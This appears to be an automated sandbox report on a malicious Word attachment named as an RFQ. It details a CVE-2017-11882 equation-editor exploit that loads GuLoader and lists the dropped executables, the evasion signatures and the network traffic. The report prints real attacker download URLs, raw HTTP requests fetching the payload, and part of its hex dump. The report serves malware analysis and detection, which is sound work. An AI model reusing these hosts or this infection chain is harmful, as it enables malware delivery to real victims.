Windows Analysis Report RFQ with Specification (Fitch Solutions).docx

Overview

General Information

Sample Name: RFQ with Specification (Fitch Solutions).docx
Analysis ID: 531863
MD5: 6f6e82505d97090f456dcd944678670d
SHA1: 3e95e486346d44c053ef45748266b3da916110c9
SHA256: 363d7304454fc6f29f8eff497d56470beb41b1d7a013ec3ab5b4191847278bd3
Tags: doc
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Contains an external reference to another file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000F.00000002.717553624.00000000002E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A"}
Multi AV Scanner detection for submitted file
Source: RFQ with Specification (Fitch Solutions).docx Virustotal: Detection: 27% Perma Link
Source: RFQ with Specification (Fitch Solutions).docx ReversingLabs: Detection: 15%
Antivirus detection for URL or domain
Source: http://192.3.122.180/1100/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk Virustotal: Detection: 13% Perma Link
Source: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/ Virustotal: Detection: 11% Perma Link
Source: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/. Virustotal: Detection: 12% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 13%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Rorqu.pdb source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406873 FindFirstFileW,FindClose, 9_2_00406873
Source: C:\Users\Public\vbc.exe Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_00405C49
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040290B FindFirstFileW, 9_2_0040290B

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onedrive.live.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 192.3.122.180:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49165 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49166 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49167 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49167 -> 192.3.122.180:80
Source: Traffic Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49168 -> 192.3.122.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?cid=5A
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Dec 2021 12:53:32 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 01 Dec 2021 09:20:59 GMTETag: "2017a-5d2123122436c"Accept-Ranges: bytesContent-Length: 131450Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.122.180Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.122.180
Source: ......w_W.....W.........-Ww........-----Www.----............wW--------....wW- on 192.3.122.180.url.0.dr String found in binary or memory: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/
Source: ....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk.url.0.dr String found in binary or memory: http://192.3.122.180/......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/.
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000009.00000002.461208677.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000009.00000000.454124922.000000000040A000.00000008.00020000.sdmp, vbc[1].exe.7.dr, vbc.exe.7.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://s.symcd.com06
Source: vbc.exe, 00000009.00000002.461452307.0000000001EF0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000009.00000002.461452307.0000000001EF0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: Rorqu.exe, 0000000C.00000002.721818430.0000000003C77000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: vbc.exe, 00000009.00000002.461217946.0000000000413000.00000004.00020000.sdmp, vbc.exe, 00000009.00000002.461233834.0000000000426000.00000004.00020000.sdmp, Rorqu.exe.9.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C94CB11B-D1B2-466D-A54A-3B0D7AFF6150}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /......w_W.....W.........-Ww........-----Www.----............wW--------....wW-/....wW.........-w-w------W-------Ww-------......Ww......---w.w--wW.W.wbk HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.122.180Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.122.180Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 9_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 9_2_004056DE

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Document has an unknown application name
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE indicator application name: unknown
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040352D
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040755C 9_2_0040755C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406D85 9_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_00401724 12_2_00401724
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F023F 12_2_002F023F
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F030D 12_2_002F030D
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F0C1D 12_2_002F0C1D
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F6416 12_2_002F6416
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Code function: 12_2_002F0385 12_2_002F0385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F309C 15_2_002F309C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EBD30 15_2_002EBD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F1822 15_2_002F1822
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F1004 15_2_002F1004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F066B 15_2_002F066B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F0EE7 15_2_002F0EE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002E8D69 15_2_002E8D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EED65 15_2_002EED65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002EFDA7 15_2_002EFDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F15B8 15_2_002F15B8
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 15_2_002F2A00 NtProtectVirtualMemory, 15_2_002F2A00
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process Stats: CPU usage > 98%
Document contains no OLE stream with summary information
Source: ~WRF{E3D87781-81EF-43F9-9495-B55BE3B562FC}.tmp.0.dr OLE indicator has summary info: false
PE file contains strange resources
Source: Rorqu.exe.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: RFQ with Specification (Fitch Solutions).docx Virustotal: Detection: 27%
Source: RFQ with Specification (Fitch Solutions).docx ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Rorqu.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Rorqu.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rorqu.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Rorqu.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 9_2_0040352D
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$Q with Specification (Fitch Solutions).docx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE761.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOCX@10/23@1/1
Source: C:\Users\Public\vbc.exe Code function: 9_2_004021AA CoCreateInstance, 9_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 9_2_0040498A
